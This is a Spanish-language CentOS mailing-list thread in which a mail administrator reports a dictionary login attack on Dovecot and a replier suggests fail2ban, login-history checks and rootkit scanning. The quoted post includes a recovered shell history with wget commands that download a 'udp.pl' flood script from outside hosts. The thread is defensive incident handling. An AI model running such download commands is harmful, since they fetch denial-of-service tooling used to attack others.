Buenas Noches. Lo que indican los logs son fallos de autenticación que provienen de una dirección remota.
rhost=66.142.38.137 Para resolver esto puede instalar un paquete como fail2ban y configurarlo para que chequee los logs de dovecot y cualquier otro servicio que quieras proteger. Fail2ban verifica 3 intentos fallidos de login desde una misma ip y posteriormente procede a bloquearla por un lapso de tiempo. En cuanto al historial de comandos que mencionas deberias de verificar si fue una intrusión a tu servidor y que efecto tuvo en el mismo. si no han eliminado los registro del servidor estos comandos pueden ayudarte a saber que usuario logro entrar. last lastlog Puedes indagar más sobre que hace el código que se descargo el intruso y si tuvo algun efecto en tu servidor. generalmente estos se usan para escalar privilegios en el servidor y como rootkit. Existen herramientas como rootkithuter que te permiten detectar software malicioso en el servidor. Saludos. > From: luisroma...@hotmail.com > To: centos-es@centos.org > Date: Thu, 21 Mar 2013 15:55:31 +0000 > Subject: [CentOS-es] Servidor Scaneado por un diccionario de datos en > postfix+dovecot > > Buenos días a todos de la lista: > Primero que nada les cuento la experiencia que estoy pasando con mi > servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he > notado que el servidor a las 5:00PM es atacado/escaneado o algo asi > tratando de conectarse al dovecot especificamente ,les posteo lo que > sale...--------------------- pam_unix Begin > ------------------------ > > dovecot: > > Authentication > Failures: > > contacto > rhost=66.142.38.137 : 88 Time(s) > > teste > rhost=66.142.38.137 : 88 Time(s) > > basura > rhost=66.142.38.137 : 65 Time(s) > > renata > rhost=66.142.38.137 : 65 Time(s) > > financeiro > rhost=66.142.38.137 : 64 Time(s) > > biblioteca > rhost=66.142.38.137 : 62 Time(s) > > bodega > rhost=66.142.38.137 : 62 Time(s) > > licita > rhost=66.142.38.137 : 62 Time(s) > > clientes > rhost=66.142.38.137 : 61 Time(s) > > contabilidad > rhost=66.142.38.137 : 59 Time(s) > > estudio > rhost=66.142.38.137 : 59 Time(s) > > mrivera > rhost=66.142.38.137 : 58 Time(s) > > patricio > rhost=66.142.38.137 : 58 Time(s) > > prueba > rhost=66.142.38.137 : 58 Time(s) > > usuario > rhost=66.142.38.137 : 58 Time(s) > > turismo > rhost=66.142.38.137 : 57 Time(s) .......... ................. > ............(hay mas resgisto q no lo pongo es bastante todos salen de > la misma ip) Unknown Entries: > > check pass; > user unknown: 3901 Time(s) > Al parecer es un diccionario que prueba esos usuarios para ingresar al > dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo > detectar como y donde se ejecuta, pero si averigue que hicieron y que se > bajaron para realizar esto. > el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con > conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, > (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget > www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping > www.google.com.peps xcd /tmpls -awpasswd mcondeexit > El detalle es que desde ese momento ya tengo el problema que les comente > lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? > espero me puedan alguna señal de como detectar de donde se ejecuta dicho > escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un > scaneo externo. > Saludos > Luis Roman > > > _______________________________________________ > CentOS-es mailing list > CentOS-es@centos.org > http://lists.centos.org/mailman/listinfo/centos-es _______________________________________________ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
